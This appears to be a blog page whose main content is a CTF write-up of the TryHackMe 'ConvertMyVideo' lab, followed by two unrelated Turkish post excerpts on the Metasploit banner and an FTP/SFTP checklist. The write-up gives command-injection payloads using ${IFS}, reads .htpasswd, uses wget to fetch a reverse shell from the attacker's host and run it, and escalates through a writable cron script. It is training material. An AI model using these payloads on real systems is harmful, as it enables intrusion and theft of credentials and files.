TryHackMe — ConvertMyVideo

It’s a very good lab and you can test lots of different topics at the same time;

# I scan with nmap

sudo nmap -sV 10.10.124.59

# find web port to open and browse it;

# in parallel I start dirbsearch to find folders

sudo ./dirsearch.py -u http://10.10.124.59 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e js,php,html -x 403,404

# so first question answer we find quickly /admin folder our secret folder;

#so I understand basic Authentication and user credential need; I started password attack and also the as same time I started to web application testing

in Burp i start request manipulations ;

First thing i investigate yt_url part when i write

# |ls

i can execute my command, and after that, i think very simple room to solve;

#but after that i sent lots of Linux command and take every time to error; so i more create error and search from internet youtube-dl

# i find source code off youtube_dl

ytdl-org/youtube-dlyoutube-dl – download videos from youtube.com or other video platforms To install it right away for all UNIX users…github.com

# my test i every time took error about not true parameter and options; so when looked github page i saw valid options

# and send first option — help over burp

yt_url — help

and bingoo — help options worked for me; all help information i can saw in response ,

# after that step i try to send more powerful command which one help to reach my aim, and i spend 1,5 about that;

#main problem simple command like ls, id executed but when i try to execute ls -al every time take syntax errors; so i more focus sent command without space;

#Google best helper me search :

“How to send a command with arguments without spaces?”

How to send a command with arguments without spaces?Thanks for contributing an answer to Unix & Linux Stack Exchange! Please be sure to answer the question. Provide…unix.stackexchange.com

and find a true perspective

cat${IFS}file.txt

So using ${IFS} i can send command using without space; but before this job i send all my request burp repeater to more efficiently manipulation;

#please be careful that part because our parameter must be;

— version;ls${IFS}-al;

note: (- -) in the display looks like — and also you can use all option — help; — execute, — version

#so i can access all command that method; now i try to access /admin folder;

yt_url= — version;ls${IFS}/var/www/html/admin${IFS}-al;

# found .htpasswd and flag.txt

for reading flag.txt

yt_url= — version;cat${IFS}/var/www/html/admin/flag.txt;

and as the same method when you look to .htpasswd;

yt_url= — version;cat${IFS}/var/www/html/admin/.htpasswd;

you can find user;

Now i need to ever shell to execute for that reason i prepare bash based reverse shell.sh in my kali computer.

and start my kali

python -m SimpleHTTPServer 8090

and over burp vulnerable machine i try to install that file

yt_url= — version;wget${IFS}http://10.9.32.166:8090/shell.sh;

— version;chmod${IFS}755${IFS}/var/www/html/shell.sh;

so i installed and give execution permission after that i start in my kali nc to listen;

when over burp start shell.sh have shell 🙂

–version;bash${IFS}shell.sh;

#when i have console i look all method spend 2 hours and last i find one way only change; is there clean.sh script under temp folder; and some cronjob execute it periodically and editable from my self; (how can i know only CTF experience)

so i try to execute that command;

echo ‘ cat /root/root.txt >root-oldum’ >>clean.sh

and bingo i have root-oldum file as the same directory includes root.txt flag.

Super CTF Thank you overjt

Metasploit Banner’ının Değiştirilmesi

Metasploit’in kendine ait her açılıştı random gelen eğlenceli bannerlarınızı hepiniz bilirsiniz. Rusyada capture flag yarışmasına katıldığımda aynı yarışaya katılan bir ekibin tümünde ekip ruhu olması açısından özelleştirimiş metasploit bannerlarını görünce bu yazıyı yazmaya karar verdim.

Yazımızın asıl amacı görsel olarak metasploit bannerının özelleştirilmesi olacak. Bu basit işlem için öncelikle metasploit banner dosyasını bulmanız gerekmekte bu dosyanın adı “banner.rb” %msfdir%/lib/msf/ui altında bulunmaktadır.

Okumaya devam et “Metasploit Banner’ının Değiştirilmesi”

IT Security Baseline – 5 (FTP/SFTP) Türkçe

Bir çok kurumda kurulu işletim sistemleri cihazların minimum güvenlik seviyeleri belirli aralıklarla kontrol edilmektedir. Kurumlar kendi oluşturdukları güvenlik listeleri yada internetten buldukları listelerle bu kontrol maddelerinin üzerinden geçmektedirler.

Zamanında oluşturduğum kontrol listelerini sizlerle paylaşmak istiyorum. Tamamen Türkçe ve sizlerin eklemesine geliştirmesine açık.

FTP_SFTP_CheckList_v0.0